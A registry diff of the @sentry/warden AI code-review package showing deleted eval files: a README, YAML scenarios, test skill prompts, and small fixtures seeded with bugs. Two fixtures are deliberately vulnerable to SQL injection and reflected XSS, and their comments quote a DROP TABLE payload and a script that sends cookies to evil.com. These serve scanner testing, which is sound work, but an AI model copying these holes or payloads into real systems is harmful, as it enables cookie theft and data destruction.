@sentry/warden 0.12.0 → 0.14.0

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Files changed (145) hide show
  1. package/agents.lock +66 -0
  2. package/dist/cli/args.d.ts +17 -9
  3. package/dist/cli/args.d.ts.map +1 -1
  4. package/dist/cli/args.js +51 -2
  5. package/dist/cli/args.js.map +1 -1
  6. package/dist/cli/commands/add.js +1 -1
  7. package/dist/cli/commands/add.js.map +1 -1
  8. package/dist/cli/commands/init.d.ts +0 -3
  9. package/dist/cli/commands/init.d.ts.map +1 -1
  10. package/dist/cli/commands/init.js +219 -24
  11. package/dist/cli/commands/init.js.map +1 -1
  12. package/dist/cli/commands/logs.d.ts +19 -0
  13. package/dist/cli/commands/logs.d.ts.map +1 -0
  14. package/dist/cli/commands/logs.js +419 -0
  15. package/dist/cli/commands/logs.js.map +1 -0
  16. package/dist/cli/commands/sync.d.ts.map +1 -1
  17. package/dist/cli/commands/sync.js +16 -4
  18. package/dist/cli/commands/sync.js.map +1 -1
  19. package/dist/cli/fix.d.ts.map +1 -1
  20. package/dist/cli/fix.js +6 -1
  21. package/dist/cli/fix.js.map +1 -1
  22. package/dist/cli/log-cleanup.d.ts +6 -5
  23. package/dist/cli/log-cleanup.d.ts.map +1 -1
  24. package/dist/cli/log-cleanup.js +11 -10
  25. package/dist/cli/log-cleanup.js.map +1 -1
  26. package/dist/cli/main.d.ts.map +1 -1
  27. package/dist/cli/main.js +87 -29
  28. package/dist/cli/main.js.map +1 -1
  29. package/dist/cli/output/formatters.d.ts +8 -2
  30. package/dist/cli/output/formatters.d.ts.map +1 -1
  31. package/dist/cli/output/formatters.js +40 -19
  32. package/dist/cli/output/formatters.js.map +1 -1
  33. package/dist/cli/output/index.d.ts +2 -2
  34. package/dist/cli/output/index.d.ts.map +1 -1
  35. package/dist/cli/output/index.js +2 -2
  36. package/dist/cli/output/index.js.map +1 -1
  37. package/dist/cli/output/ink-runner.js +1 -1
  38. package/dist/cli/output/ink-runner.js.map +1 -1
  39. package/dist/cli/output/jsonl.d.ts +51 -14
  40. package/dist/cli/output/jsonl.d.ts.map +1 -1
  41. package/dist/cli/output/jsonl.js +140 -7
  42. package/dist/cli/output/jsonl.js.map +1 -1
  43. package/dist/cli/output/reporter.d.ts +4 -0
  44. package/dist/cli/output/reporter.d.ts.map +1 -1
  45. package/dist/cli/output/reporter.js +14 -0
  46. package/dist/cli/output/reporter.js.map +1 -1
  47. package/dist/cli/output/tasks.d.ts +3 -1
  48. package/dist/cli/output/tasks.d.ts.map +1 -1
  49. package/dist/cli/output/tasks.js +7 -4
  50. package/dist/cli/output/tasks.js.map +1 -1
  51. package/dist/cli/terminal.d.ts +4 -3
  52. package/dist/cli/terminal.d.ts.map +1 -1
  53. package/dist/cli/terminal.js +22 -11
  54. package/dist/cli/terminal.js.map +1 -1
  55. package/dist/config/loader.d.ts +3 -1
  56. package/dist/config/loader.d.ts.map +1 -1
  57. package/dist/config/loader.js +2 -0
  58. package/dist/config/loader.js.map +1 -1
  59. package/dist/config/schema.d.ts +84 -70
  60. package/dist/config/schema.d.ts.map +1 -1
  61. package/dist/config/schema.js +7 -1
  62. package/dist/config/schema.js.map +1 -1
  63. package/dist/evals/types.d.ts +9 -15
  64. package/dist/evals/types.d.ts.map +1 -1
  65. package/dist/index.d.ts +2 -2
  66. package/dist/index.d.ts.map +1 -1
  67. package/dist/index.js +2 -0
  68. package/dist/index.js.map +1 -1
  69. package/dist/output/dedup.d.ts +14 -10
  70. package/dist/output/dedup.d.ts.map +1 -1
  71. package/dist/output/dedup.js +39 -17
  72. package/dist/output/dedup.js.map +1 -1
  73. package/dist/output/github-checks.d.ts +5 -3
  74. package/dist/output/github-checks.d.ts.map +1 -1
  75. package/dist/output/github-checks.js +14 -16
  76. package/dist/output/github-checks.js.map +1 -1
  77. package/dist/output/issue-renderer.js +1 -1
  78. package/dist/output/issue-renderer.js.map +1 -1
  79. package/dist/output/renderer.d.ts.map +1 -1
  80. package/dist/output/renderer.js +11 -7
  81. package/dist/output/renderer.js.map +1 -1
  82. package/dist/output/types.d.ts +3 -1
  83. package/dist/output/types.d.ts.map +1 -1
  84. package/dist/sdk/analyze.d.ts.map +1 -1
  85. package/dist/sdk/analyze.js +12 -5
  86. package/dist/sdk/analyze.js.map +1 -1
  87. package/dist/sdk/auth.d.ts +16 -0
  88. package/dist/sdk/auth.d.ts.map +1 -0
  89. package/dist/sdk/auth.js +37 -0
  90. package/dist/sdk/auth.js.map +1 -0
  91. package/dist/sdk/errors.d.ts +5 -0
  92. package/dist/sdk/errors.d.ts.map +1 -1
  93. package/dist/sdk/errors.js +20 -0
  94. package/dist/sdk/errors.js.map +1 -1
  95. package/dist/sdk/prompt.d.ts.map +1 -1
  96. package/dist/sdk/prompt.js +3 -1
  97. package/dist/sdk/prompt.js.map +1 -1
  98. package/dist/sdk/runner.d.ts +2 -1
  99. package/dist/sdk/runner.d.ts.map +1 -1
  100. package/dist/sdk/runner.js +3 -1
  101. package/dist/sdk/runner.js.map +1 -1
  102. package/dist/skills/remote.d.ts +4 -0
  103. package/dist/skills/remote.d.ts.map +1 -1
  104. package/dist/skills/remote.js +47 -27
  105. package/dist/skills/remote.js.map +1 -1
  106. package/dist/types/index.d.ts +42 -22
  107. package/dist/types/index.d.ts.map +1 -1
  108. package/dist/types/index.js +45 -7
  109. package/dist/types/index.js.map +1 -1
  110. package/package.json +1 -1
  111. package/{plugins/warden/skills → skills}/warden/SKILL.md +2 -4
  112. package/{plugins/warden/skills → skills}/warden/references/cli-reference.md +7 -9
  113. package/{plugins/warden/skills → skills}/warden/references/config-schema.md +5 -7
  114. package/{plugins/warden/skills → skills}/warden/references/configuration.md +10 -8
  115. package/{plugins/warden/skills → skills}/warden/references/creating-skills.md +6 -6
  116. package/skills/warden-sweep/SKILL.md +407 -0
  117. package/skills/warden-sweep/scripts/_utils.py +37 -0
  118. package/skills/warden-sweep/scripts/extract_findings.py +219 -0
  119. package/skills/warden-sweep/scripts/find_reviewers.py +115 -0
  120. package/skills/warden-sweep/scripts/generate_report.py +271 -0
  121. package/skills/warden-sweep/scripts/index_prs.py +187 -0
  122. package/skills/warden-sweep/scripts/organize.py +315 -0
  123. package/skills/warden-sweep/scripts/scan.py +632 -0
  124. package/.claude-plugin/marketplace.json +0 -20
  125. package/.mcp.json +0 -8
  126. package/agents.toml +0 -7
  127. package/conductor.json +0 -8
  128. package/evals/README.md +0 -154
  129. package/evals/bug-detection.yaml +0 -56
  130. package/evals/fixtures/ignores-style-issues/utils.ts +0 -48
  131. package/evals/fixtures/missing-await/cache.ts +0 -45
  132. package/evals/fixtures/null-property-access/handler.ts +0 -36
  133. package/evals/fixtures/off-by-one/paginator.ts +0 -38
  134. package/evals/fixtures/sql-injection/api.ts +0 -59
  135. package/evals/fixtures/stale-closure/counter.tsx +0 -33
  136. package/evals/fixtures/wrong-comparison/validator.ts +0 -52
  137. package/evals/fixtures/xss-reflected/server.ts +0 -55
  138. package/evals/precision.yaml +0 -15
  139. package/evals/security-scanning.yaml +0 -24
  140. package/evals/skills/bug-detection.md +0 -33
  141. package/evals/skills/precision.md +0 -18
  142. package/evals/skills/security-scanning.md +0 -32
  143. package/plugins/.claude-plugin/marketplace.json +0 -14
  144. package/plugins/warden/.claude-plugin/plugin.json +0 -7
  145. package/scripts/update-pricing.ts +0 -88
package/evals/README.md DELETED
@@ -1,154 +0,0 @@
1
- # Warden Evals
2
-
3
- End-to-end behavioral evaluations for the Warden pipeline. These evals verify
4
- that Warden correctly runs skills, invokes the agent, extracts findings, and
5
- produces the expected behavioral outcomes on known code.
6
-
7
- ## Philosophy
8
-
9
- Evals are not unit tests or A/B comparisons. They answer one question:
10
-
11
- > **Does the Warden pipeline behave correctly when given known inputs?**
12
-
13
- Each eval provides code with a known issue, runs the full Warden agent pipeline
14
- (skill loading, prompt construction, SDK invocation, finding extraction), and
15
- uses an LLM judge to verify the output matches behavioral expectations.
16
-
17
- Evals test **Warden's behavior**, not individual skills. Skills are used as
18
- test vehicles to exercise the pipeline.
19
-
20
- The only thing mocked is the GitHub event payload. Everything else runs for
21
- real.
22
-
23
- ## YAML Format
24
-
25
- Evals are defined in YAML files at the top level of `evals/`. Each file
26
- describes a category of behaviors with a shared test skill and a list of
27
- scenarios. No custom code per eval. Adding a new eval means adding an entry
28
- to a YAML file and a fixture file.
29
-
30
- ```yaml
31
- skill: skills/bug-detection.md
32
-
33
- evals:
34
- - name: null-property-access
35
- given: code that accesses properties on an array .find() result without null checking
36
- files:
37
- - fixtures/null-property-access/handler.ts
38
- should_find:
39
- - finding: accessing .name on a potentially undefined user object from Array.find()
40
- severity: high
41
- should_not_find:
42
- - style, formatting, or naming issues
43
- - the lack of try/catch around the fetch call
44
- ```
45
-
46
- This reads as:
47
-
48
- > **Given** code that accesses properties on an array `.find()` result without
49
- > null checking, Warden **should find** a null access bug and **should not
50
- > find** style issues.
51
-
52
- ## Eval Structure
53
-
54
- ```
55
- evals/
56
- ├── README.md
57
- ├── bug-detection.yaml # Category: finding logic bugs
58
- ├── security-scanning.yaml # Category: finding security vulnerabilities
59
- ├── precision.yaml # Category: avoiding false positives
60
- ├── skills/ # Test skills (vehicles for exercising pipeline)
61
- │ ├── bug-detection.md
62
- │ ├── security-scanning.md
63
- │ └── precision.md
64
- └── fixtures/ # Source code with known issues
65
- ├── null-property-access/
66
- │ └── handler.ts
67
- ├── off-by-one/
68
- │ └── paginator.ts
69
- ├── missing-await/
70
- │ └── cache.ts
71
- ├── wrong-comparison/
72
- │ └── validator.ts
73
- ├── stale-closure/
74
- │ └── counter.tsx
75
- ├── sql-injection/
76
- │ └── api.ts
77
- ├── xss-reflected/
78
- │ └── server.ts
79
- └── ignores-style-issues/
80
- └── utils.ts
81
- ```
82
-
83
- ## YAML Schema
84
-
85
- ### File-level fields
86
-
87
- | Field | Required | Description |
88
- |-------|----------|-------------|
89
- | `skill` | Yes | Path to test skill, relative to `evals/` |
90
- | `model` | No | Default model for all evals (default: `claude-sonnet-4-6`) |
91
- | `evals` | Yes | List of eval scenarios (at least one) |
92
-
93
- ### Per-eval fields
94
-
95
- | Field | Required | Description |
96
- |-------|----------|-------------|
97
- | `name` | Yes | Scenario name (used in test output) |
98
- | `given` | Yes | What code/situation the eval sets up (BDD "given") |
99
- | `files` | Yes | Fixture files, relative to `evals/` |
100
- | `model` | No | Model override for this scenario |
101
- | `should_find` | Yes | What the pipeline should detect (at least one) |
102
- | `should_find[].finding` | Yes | Natural language description for the LLM judge |
103
- | `should_find[].severity` | No | Expected severity (hint, not strict) |
104
- | `should_find[].required` | No | If true (default), eval fails when not found |
105
- | `should_not_find` | No | Things the pipeline should NOT report (precision) |
106
-
107
- ## Running Evals
108
-
109
- ```bash
110
- # Run all evals (requires ANTHROPIC_API_KEY)
111
- pnpm test:evals
112
-
113
- # Run evals for a specific category
114
- pnpm test:evals -- --grep "bug-detection"
115
-
116
- # Run a single eval
117
- pnpm test:evals -- --grep "null-property-access"
118
- ```
119
-
120
- Evals make real API calls. They run skills on `claude-sonnet-4-6` by
121
- default.
122
-
123
- ## Adding a New Eval
124
-
125
- 1. Pick an existing YAML file or create a new `evals/<category>.yaml`
126
- 2. Add a scenario entry under the `evals:` key
127
- 3. Create a fixture file under `evals/fixtures/<scenario>/`
128
- 4. Run `pnpm test:evals` to verify
129
-
130
- If a new category needs a different test skill, add it to `evals/skills/`.
131
-
132
- ### Guidelines
133
-
134
- - **One bug per eval.** Each scenario tests one specific behavior.
135
- - **Make bugs realistic.** Code should look like something a human wrote.
136
- - **Write precise `should_find`.** "null access on user.name from Array.find()"
137
- is better than "finds a bug."
138
- - **Include `should_not_find`.** If the code has issues the skill should ignore,
139
- call them out.
140
- - **Keep fixtures small.** 20-80 lines. The agent analyzes hunks, not novels.
141
- - **No custom code.** Every eval is just YAML + fixture files.
142
-
143
- ## How It Works
144
-
145
- 1. **Discovery**: Scan `evals/` for `.yaml` files
146
- 2. **Loading**: Parse YAML, validate with Zod, resolve paths
147
- 3. **Git repo**: Create a temp repo with fixture files committed on an `eval`
148
- branch (empty `main` as base), so the agent has a real repo to explore
149
- 4. **Context**: Build `EventContext` from real `git diff main...eval`
150
- 5. **Execution**: Run the skill via `runSkill()` with the real SDK pipeline;
151
- the agent operates in the temp repo with Read/Grep tools
152
- 6. **Judgment**: An LLM judge (Sonnet) evaluates findings against assertions
153
- 7. **Verdict**: Pass if all required `should_find` are met and no
154
- `should_not_find` are violated
@@ -1,56 +0,0 @@
1
- skill: skills/bug-detection.md
2
-
3
- evals:
4
- - name: null-property-access
5
- given: code that accesses properties on an array .find() result without null checking
6
- files:
7
- - fixtures/null-property-access/handler.ts
8
- should_find:
9
- - finding: accessing .name and .profile.avatar on a potentially undefined user object from Array.find()
10
- severity: high
11
- should_not_find:
12
- - style, formatting, or naming issues
13
- - the lack of try/catch around the fetch call
14
-
15
- - name: off-by-one
16
- given: pagination logic that uses Math.floor instead of Math.ceil, skipping the last page
17
- files:
18
- - fixtures/off-by-one/paginator.ts
19
- should_find:
20
- - finding: off-by-one error in page count calculation that loses the last page when totalItems is not evenly divisible by pageSize
21
- severity: medium
22
- should_not_find:
23
- - use of any[] type
24
- - missing error handling
25
-
26
- - name: missing-await
27
- given: async cache lookup missing await, causing a Promise object to be used as a truthy value
28
- files:
29
- - fixtures/missing-await/cache.ts
30
- should_find:
31
- - finding: missing await on loadFromCache() call, so cached is always a truthy Promise and the function never actually fetches fresh data
32
- severity: high
33
- should_not_find:
34
- - console.log statements
35
- - missing return type annotations
36
-
37
- - name: wrong-comparison
38
- given: permission check using <= instead of >=, inverting the access control logic
39
- files:
40
- - fixtures/wrong-comparison/validator.ts
41
- should_find:
42
- - finding: comparison operator is <= instead of >=, granting access to lower-privilege users while denying higher-privilege users
43
- severity: high
44
- should_not_find:
45
- - hardcoded role strings
46
- - suggestion to use an enum for roles
47
-
48
- - name: stale-closure
49
- given: React useEffect with setInterval that captures count in a stale closure
50
- files:
51
- - fixtures/stale-closure/counter.tsx
52
- should_find:
53
- - finding: "stale closure: setInterval callback captures initial count value and never sees updates, so the counter always sets the same value"
54
- severity: high
55
- should_not_find:
56
- - TypeScript type annotation issues
@@ -1,48 +0,0 @@
1
- // This code is functionally correct but has style issues.
2
- // A precision-focused eval: the skill should NOT report any of these as bugs.
3
-
4
- // Inconsistent naming convention (camelCase vs snake_case)
5
- export function calculate_total(items: number[]): number {
6
- let runningTotal = 0;
7
- for (let i = 0; i < items.length; i++) {
8
- runningTotal = runningTotal + items[i]!;
9
- }
10
- return runningTotal;
11
- }
12
-
13
- // Verbose conditional (could be simplified but is correct)
14
- export function isEligible(age: number, hasConsent: boolean): boolean {
15
- if (age >= 18) {
16
- if (hasConsent === true) {
17
- return true;
18
- } else {
19
- return false;
20
- }
21
- } else {
22
- return false;
23
- }
24
- }
25
-
26
- // Missing JSDoc, long parameter list, but functionally correct
27
- export function formatAddress(
28
- street: string,
29
- city: string,
30
- state: string,
31
- zip: string,
32
- country: string
33
- ): string {
34
- const parts = [street, city, state, zip, country];
35
- return parts.filter((p) => p.length > 0).join(', ');
36
- }
37
-
38
- // Magic numbers but correct behavior
39
- export function calculateDiscount(price: number, quantity: number): number {
40
- if (quantity >= 100) {
41
- return price * 0.8;
42
- } else if (quantity >= 50) {
43
- return price * 0.9;
44
- } else if (quantity >= 10) {
45
- return price * 0.95;
46
- }
47
- return price;
48
- }
@@ -1,45 +0,0 @@
1
- interface CacheEntry {
2
- key: string;
3
- value: string;
4
- expiresAt: number;
5
- }
6
-
7
- const store = new Map<string, CacheEntry>();
8
-
9
- async function saveToCache(key: string, value: string, ttlMs: number): Promise<void> {
10
- // Simulate async storage (e.g., Redis, database)
11
- await new Promise((resolve) => setTimeout(resolve, 1));
12
- store.set(key, {
13
- key,
14
- value,
15
- expiresAt: Date.now() + ttlMs,
16
- });
17
- }
18
-
19
- async function loadFromCache(key: string): Promise<string | null> {
20
- await new Promise((resolve) => setTimeout(resolve, 1));
21
- const entry = store.get(key);
22
- if (!entry) return null;
23
- if (Date.now() > entry.expiresAt) {
24
- store.delete(key);
25
- return null;
26
- }
27
- return entry.value;
28
- }
29
-
30
- export async function getOrFetchData(key: string, fetchFn: () => Promise<string>): Promise<string> {
31
- // Bug: missing await on loadFromCache. The result `cached` will be a
32
- // Promise, which is truthy, so the function always returns a Promise
33
- // object (as a string) instead of the actual cached value.
34
- const cached = loadFromCache(key);
35
-
36
- if (cached) {
37
- console.log('Cache hit:', key);
38
- return cached as unknown as string;
39
- }
40
-
41
- console.log('Cache miss:', key);
42
- const fresh = await fetchFn();
43
- await saveToCache(key, fresh, 60_000);
44
- return fresh;
45
- }
@@ -1,36 +0,0 @@
1
- interface User {
2
- id: string;
3
- name: string;
4
- email: string;
5
- profile: {
6
- avatar: string;
7
- bio: string;
8
- };
9
- }
10
-
11
- interface ApiResponse {
12
- users: User[];
13
- total: number;
14
- }
15
-
16
- async function fetchUsers(endpoint: string): Promise<ApiResponse> {
17
- const response = await fetch(endpoint);
18
- return response.json() as Promise<ApiResponse>;
19
- }
20
-
21
- export async function getUserDisplayName(userId: string): Promise<string> {
22
- const data = await fetchUsers(`/api/users?id=${userId}`);
23
- const user = data.users.find((u) => u.id === userId);
24
-
25
- // Bug: user could be undefined if not found in the array,
26
- // but we access .name without checking
27
- const displayName = user.name;
28
- const avatarUrl = user.profile.avatar;
29
-
30
- return `${displayName} (${avatarUrl})`;
31
- }
32
-
33
- export async function getTeamMembers(teamId: string): Promise<string[]> {
34
- const data = await fetchUsers(`/api/teams/${teamId}/members`);
35
- return data.users.map((u) => u.name);
36
- }
@@ -1,38 +0,0 @@
1
- export interface PaginatedResult<T> {
2
- items: T[];
3
- page: number;
4
- totalItems: number;
5
- pageSize: number;
6
- }
7
-
8
- /**
9
- * Fetch all pages of results from a paginated API endpoint.
10
- * Collects items from every page and returns them as a flat array.
11
- */
12
- export async function fetchAllPages<T>(
13
- fetchPage: (page: number) => Promise<PaginatedResult<T>>
14
- ): Promise<T[]> {
15
- const firstPage = await fetchPage(1);
16
- const allItems: T[] = [...firstPage.items];
17
-
18
- // Bug: Math.floor loses the last page when totalItems is not evenly
19
- // divisible by pageSize. E.g., 25 items / 10 per page = 2.5, floored
20
- // to 2, so page 3 (items 21-25) is never fetched.
21
- const totalPages = Math.floor(firstPage.totalItems / firstPage.pageSize);
22
-
23
- for (let page = 2; page <= totalPages; page++) {
24
- const result = await fetchPage(page);
25
- allItems.push(...result.items);
26
- }
27
-
28
- return allItems;
29
- }
30
-
31
- /**
32
- * Get a specific page range of results.
33
- */
34
- export function getPageRange(totalItems: number, pageSize: number, currentPage: number): { start: number; end: number } {
35
- const start = (currentPage - 1) * pageSize;
36
- const end = Math.min(start + pageSize, totalItems);
37
- return { start, end };
38
- }
@@ -1,59 +0,0 @@
1
- interface DbConnection {
2
- query(sql: string): Promise<Record<string, unknown>[]>;
3
- }
4
-
5
- function getConnection(): DbConnection {
6
- // In production this returns a real DB connection
7
- return {
8
- query: async (sql: string) => {
9
- console.log('Executing:', sql);
10
- return [];
11
- },
12
- };
13
- }
14
-
15
- interface SearchParams {
16
- name?: string;
17
- email?: string;
18
- role?: string;
19
- }
20
-
21
- /**
22
- * Search for users matching the given criteria.
23
- * Builds a dynamic WHERE clause from the search parameters.
24
- */
25
- export async function searchUsers(params: SearchParams): Promise<Record<string, unknown>[]> {
26
- const db = getConnection();
27
- const conditions: string[] = [];
28
-
29
- if (params.name) {
30
- // Bug: Direct string interpolation of user input into SQL query.
31
- // An attacker can pass name = "'; DROP TABLE users; --" to execute
32
- // arbitrary SQL.
33
- conditions.push(`name = '${params.name}'`);
34
- }
35
- if (params.email) {
36
- conditions.push(`email = '${params.email}'`);
37
- }
38
- if (params.role) {
39
- conditions.push(`role = '${params.role}'`);
40
- }
41
-
42
- const whereClause = conditions.length > 0
43
- ? `WHERE ${conditions.join(' AND ')}`
44
- : '';
45
-
46
- const sql = `SELECT id, name, email, role FROM users ${whereClause}`;
47
- return db.query(sql);
48
- }
49
-
50
- /**
51
- * Get a user by their ID (this one is safe - uses parameterized approach).
52
- */
53
- export async function getUserById(id: number): Promise<Record<string, unknown> | null> {
54
- const db = getConnection();
55
- // This is safe because we validate the type
56
- if (!Number.isInteger(id) || id <= 0) return null;
57
- const results = await db.query(`SELECT * FROM users WHERE id = ${id}`);
58
- return results[0] ?? null;
59
- }
@@ -1,33 +0,0 @@
1
- import { useState, useEffect } from 'react';
2
-
3
- interface CounterProps {
4
- initialValue: number;
5
- step: number;
6
- intervalMs: number;
7
- }
8
-
9
- /**
10
- * An auto-incrementing counter that ticks at a given interval.
11
- */
12
- export function AutoCounter({ initialValue, step, intervalMs }: CounterProps) {
13
- const [count, setCount] = useState(initialValue);
14
-
15
- useEffect(() => {
16
- // Bug: This closure captures `count` once at mount time.
17
- // Every tick reads the same stale `count` value and sets
18
- // count to initialValue + step, over and over. The counter
19
- // never actually increments past the first tick.
20
- const id = setInterval(() => {
21
- setCount(count + step);
22
- }, intervalMs);
23
-
24
- return () => clearInterval(id);
25
- // eslint-disable-next-line react-hooks/exhaustive-deps
26
- }, []);
27
-
28
- return (
29
- <div>
30
- <span data-testid="count">{count}</span>
31
- </div>
32
- );
33
- }
@@ -1,52 +0,0 @@
1
- interface Permission {
2
- resource: string;
3
- action: 'read' | 'write' | 'delete';
4
- role: string;
5
- }
6
-
7
- const ROLE_HIERARCHY: Record<string, number> = {
8
- viewer: 0,
9
- editor: 1,
10
- admin: 2,
11
- superadmin: 3,
12
- };
13
-
14
- /**
15
- * Check if a user's role has sufficient permissions for an action.
16
- * Returns true if the user is allowed to perform the action.
17
- */
18
- export function hasPermission(userRole: string, requiredRole: string): boolean {
19
- const userLevel = ROLE_HIERARCHY[userRole] ?? 0;
20
- const requiredLevel = ROLE_HIERARCHY[requiredRole] ?? 0;
21
-
22
- // Bug: should be >= but uses <=, so only users with LOWER privilege
23
- // than required are granted access (e.g., a viewer can perform admin
24
- // actions, but an admin cannot).
25
- return userLevel <= requiredLevel;
26
- }
27
-
28
- /**
29
- * Filter a list of permissions to only those a user can perform.
30
- */
31
- export function filterAllowedActions(
32
- userRole: string,
33
- permissions: Permission[]
34
- ): Permission[] {
35
- return permissions.filter((p) => hasPermission(userRole, p.role));
36
- }
37
-
38
- /**
39
- * Validate that a user can perform a specific action on a resource.
40
- */
41
- export function validateAccess(
42
- userRole: string,
43
- resource: string,
44
- action: string,
45
- permissions: Permission[]
46
- ): boolean {
47
- const matching = permissions.find(
48
- (p) => p.resource === resource && p.action === action
49
- );
50
- if (!matching) return false;
51
- return hasPermission(userRole, matching.role);
52
- }
@@ -1,55 +0,0 @@
1
- /**
2
- * Simple HTTP request handler for a search page.
3
- * Renders search results with the query term displayed back to the user.
4
- */
5
- export function handleSearchRequest(url: string): string {
6
- const parsed = new URL(url, 'http://localhost:3000');
7
- const query = parsed.searchParams.get('q') ?? '';
8
- const page = parseInt(parsed.searchParams.get('page') ?? '1', 10);
9
-
10
- // Simulate search results
11
- const results = performSearch(query, page);
12
-
13
- // Bug: The query string from the URL is interpolated directly into HTML
14
- // without escaping. An attacker can craft a URL like:
15
- // /search?q=<script>document.location='http://evil.com/?c='+document.cookie</script>
16
- // and the script will execute in the victim's browser.
17
- return `
18
- <!DOCTYPE html>
19
- <html>
20
- <head><title>Search Results</title></head>
21
- <body>
22
- <h1>Search Results</h1>
23
- <p>Showing results for: <strong>${query}</strong></p>
24
- <p>Page ${page} of ${results.totalPages}</p>
25
- <ul>
26
- ${results.items.map((item) => `<li>${escapeHtml(item.title)}</li>`).join('\n')}
27
- </ul>
28
- </body>
29
- </html>
30
- `;
31
- }
32
-
33
- function escapeHtml(text: string): string {
34
- return text
35
- .replace(/&/g, '&amp;')
36
- .replace(/</g, '&lt;')
37
- .replace(/>/g, '&gt;')
38
- .replace(/"/g, '&quot;');
39
- }
40
-
41
- interface SearchResult {
42
- items: { title: string; url: string }[];
43
- totalPages: number;
44
- }
45
-
46
- function performSearch(query: string, page: number): SearchResult {
47
- // Stub implementation
48
- return {
49
- items: [
50
- { title: `Result for "${query}" - item 1`, url: '/result/1' },
51
- { title: `Result for "${query}" - item 2`, url: '/result/2' },
52
- ],
53
- totalPages: Math.max(1, page),
54
- };
55
- }
@@ -1,15 +0,0 @@
1
- skill: skills/precision.md
2
-
3
- evals:
4
- - name: ignores-style-issues
5
- given: functionally correct code with style issues (mixed naming conventions, verbose conditionals, magic numbers)
6
- files:
7
- - fixtures/ignores-style-issues/utils.ts
8
- should_find:
9
- - finding: "no bugs: the code is functionally correct despite having style issues, so zero or only info-level findings are expected"
10
- required: false
11
- should_not_find:
12
- - inconsistent naming convention (snake_case vs camelCase)
13
- - missing JSDoc comments
14
- - verbose conditional that could be simplified
15
- - magic numbers in discount calculation
@@ -1,24 +0,0 @@
1
- skill: skills/security-scanning.md
2
-
3
- evals:
4
- - name: sql-injection
5
- given: SQL query built via string interpolation with user-supplied search parameters
6
- files:
7
- - fixtures/sql-injection/api.ts
8
- should_find:
9
- - finding: "SQL injection: user input from params.name, params.email, and params.role is directly interpolated into SQL query without parameterization"
10
- severity: critical
11
- should_not_find:
12
- - the getConnection helper implementation
13
- - missing email format validation as the primary issue
14
-
15
- - name: xss-reflected
16
- given: HTML template that renders URL query parameter directly into page without escaping
17
- files:
18
- - fixtures/xss-reflected/server.ts
19
- should_find:
20
- - finding: "reflected XSS: the query parameter from the URL is interpolated into HTML via template literal without calling escapeHtml()"
21
- severity: critical
22
- should_not_find:
23
- - hardcoded port number
24
- - missing HTTPS as the primary issue
@@ -1,33 +0,0 @@
1
- ---
2
- name: eval-bug-detection
3
- description: Test skill for bug detection evals. Finds logic errors, null handling bugs, async issues, and edge cases.
4
- ---
5
-
6
- You are an expert bug hunter analyzing code changes.
7
-
8
- ## What to Report
9
-
10
- Find bugs that will cause incorrect behavior at runtime:
11
-
12
- - Null/undefined property access without guards
13
- - Off-by-one and boundary errors
14
- - Missing await on async operations
15
- - Wrong comparison operators (< vs <=, && vs ||)
16
- - Stale closures capturing outdated values
17
- - Type coercion causing unexpected behavior
18
-
19
- ## What NOT to Report
20
-
21
- - Style or formatting preferences
22
- - Missing error handling that "might" matter
23
- - Performance concerns (unless causing incorrect behavior)
24
- - Unused variables or dead code
25
- - Missing tests or documentation
26
- - Security vulnerabilities (separate concern)
27
-
28
- ## Output Requirements
29
-
30
- For each bug, provide:
31
- - The exact file and line
32
- - What incorrect behavior occurs
33
- - What specific input or condition triggers it
@@ -1,18 +0,0 @@
1
- ---
2
- name: eval-precision
3
- description: Test skill for precision evals. Only reports logic bugs, nothing else.
4
- ---
5
-
6
- You are a strict bug detector. You ONLY report provable logic bugs.
7
-
8
- ## Rules
9
-
10
- 1. Only report bugs that WILL cause incorrect behavior
11
- 2. You must be able to construct a specific input that triggers failure
12
- 3. Do NOT report style, formatting, naming, or documentation issues
13
- 4. Do NOT report missing error handling
14
- 5. Do NOT report performance concerns
15
- 6. Do NOT report security vulnerabilities
16
- 7. If the code is correct, return an empty findings array
17
-
18
- Be extremely conservative. When in doubt, do not report.